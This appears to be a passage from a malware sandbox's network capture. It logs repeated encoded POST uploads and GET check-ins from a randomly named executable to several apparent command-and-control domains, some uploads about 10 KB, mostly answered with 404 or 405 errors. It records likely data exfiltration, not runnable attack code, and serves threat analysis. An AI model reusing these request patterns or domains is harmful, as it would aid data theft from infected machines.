Nov 1, 2024 09:19:50.632992983 CET | 10883 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Data Ascii: sn0PLN= [TRUNCATED]
Nov 1, 2024 09:19:51.281482935 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:51 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 62926 | 162.0.211.143 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:53.180800915 CET | 528 | OUT | GET /icpx/?sn0PLN=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:53.849731922 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:53 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 62927 | 195.110.124.133 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:58.987238884 CET | 802 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=MaM2/a9Gy1cbOOUIGjCwNIZI/sJnAh1rC87c0QLkcABLKd6muUaRZSdUc6//XcF7yjfqlZtygkFcxUE/NwUFhWSZX59w9uEV6DBiiC+zo+eyzfFmAMDwfp6yyfY52hBr94B2IGsFWIa50Ntrpn1kdigyHN30w+RoghMn0mmCzGETBvHY4KBkI5r/w6XNXj6INw==
Nov 1, 2024 09:19:59.824979067 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 62928 | 195.110.124.133 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:01.658086061 CET | 822 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2RLK8KmvQORVydUSa/AZ8E3yij9ldxyglhcxV0/NBUEnGSMfZ9yjeEV6DBiiDaVo6yyzv1mAp3zXJ6z1fY59BBv94ARIDRuWKi50NdrozBjTig0ad2e6doHmgtv31Ds22QqNJKCp7gza5PMt9e5agHBW4z/4XAHoX9ScrAeXdH0YCw=
Nov 1, 2024 09:20:02.418484926 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:02 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.4 | 62929 | 195.110.124.133 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:04.213329077 CET | 10904 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Origin: http://www.nutrigenfit.online
                                                                                                                      Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN= [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:05.035243988 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:04 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      32 | 192.168.2.4 | 62930 | 195.110.124.133 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:06.757955074 CET | 535 | OUT | GET /uhg3/?sn0PLN=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.nutrigenfit.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:07.625102997 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 203
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      33 | 192.168.2.4 | 62931 | 185.68.16.94 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:12.864849091 CET | 775 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=rTQVOEt/uX++BvuxghZkdwm1Rf/jenCxPbXNAq3PdHDcSx3d/Duto4PjLsXzmHiYhqDq2lQdBgUZSiBN0107mGB+d8t1n5FmlO9vO/AYDBu9c36mxr21XpBh7DKtlEAs/HnbqL/wZGUs6E7W9M7fpT+Cxku+nzAWon8H7QRQQ4TIvVRjE28bZ92bR4b0yM7JJA==
                                                                                                                      Nov 1, 2024 09:20:13.732875109 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:13 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      34 | 192.168.2.4 | 62932 | 185.68.16.94 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:15.403769016 CET | 795 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0ncST/d+BKtp4PjScXyrniDhqPi2lcdBgAZSmRN1FI0nWB8Istrj5FmlO9vO+l9DBm9cDGmg622WpBi8DKtukAo/Hn5qKTOZAYs6FLW8d7c+D+EyUv2ji9/oXB71SI1dLSvuTc5VHdML9SoM/SA/PGASOrcy1DgwWjJHOarzqoiOuQ=
                                                                                                                      Nov 1, 2024 09:20:16.307127953 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      35 | 192.168.2.4 | 62933 | 185.68.16.94 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:17.950933933 CET | 10877 | OUT | POST /pjcb/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Origin: http://www.redex.fun
                                                                                                                      Referer: http://www.redex.fun/pjcb/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN= [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:18.820733070 CET | 332 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      36 | 192.168.2.4 | 62934 | 185.68.16.94 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:20.491862059 CET | 526 | OUT | GET /pjcb/?sn0PLN=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.redex.fun
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:21.367784977 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:21 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      x-ray: p529:0.000
                                                                                                                      Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
Nov 1, 2024 09:20:21.367845058 CET | 1236 | IN
                                                                                                                      Data Ascii: a www.redex.fun nieskonfigurowana na serwerze', '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta wi
Nov 1, 2024 09:20:21.367882967 CET | 1236 | IN
                                                                                                                      Data Ascii: ex.fun ', '.message1': ' <b>www.redex.fun</b> .', '.message2': '
Nov 1, 2024 09:20:21.368396044 CET | 636 | IN
                                                                                                                      Data Ascii: www.redex.fun ', 'h1': ' www.redex.fun ', '.message1': ' <b>www.redex.fun</b>
Nov 1, 2024 09:20:21.368457079 CET | 1236 | IN
                                                                                                                      Data Ascii: '.help_button': ' ?', } }; function display(){ let default_lang = 'en', browser_lang = window.navigator.language || navigator.userLanguage,
Nov 1, 2024 09:20:21.368874073 CET | 698 | IN
                                                                                                                      Data Ascii: , .<br>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 62935 | 163.44.176.12 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:27.093945980 CET | 778 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=0V7BfKQhUsKv59GVJT+orKUfsRa5yVPHxdsX1zdq953Z35+ufewhfmvRXnJrACEQSleGfRo8/kiNC8v32KudRvBcmGefPiOsJ9M3UfAPnugEd3rX/ymBNC8Tm9KcPNqDLev9osRWCVoiRWJxi5JxeHbOR7Q0bFOX9uW1h6sZnbrmAfiwPcLUagxmCDt8s5ba+g==
Nov 1, 2024 09:20:27.968399048 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:27 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 1, 2024 09:20:27.968461037 CET | 271 | IN
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 62936 | 163.44.176.12 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:29.635776043 CET | 798 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=0V7BfKQhUsKv292VM0CotqUcixa571OOxdgX1yZ66MHZ3YOuecIhYmvRfHIhECEXSlS0fTM8/kmNC9f3252eQ/BSumedACOsJ9M3Ubopnu4EdGbX8WKCSy8MxNKcLNqHLeuootc7CXAiRX5xjslyVHbIOrRgcXry5/najMEqiOPRFZvqetqDIgVVfEkIh6mTlosNj1Nk7BvCQ54hflJH9SA=
Nov 1, 2024 09:20:30.492352009 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:30 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 1, 2024 09:20:30.492405891 CET | 271 | IN
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 62937 | 163.44.176.12 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:32.185702085 CET | 10880 | OUT | POST /51fd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Origin: http://www.broork.sbs
                                                                                                                      Referer: http://www.broork.sbs/51fd/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Data Ascii: sn0PLN= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 62938 | 163.44.176.12 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:34.730084896 CET | 527 | OUT | GET /51fd/?sn0PLN=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.broork.sbs
                                                                                                                      Connection: close
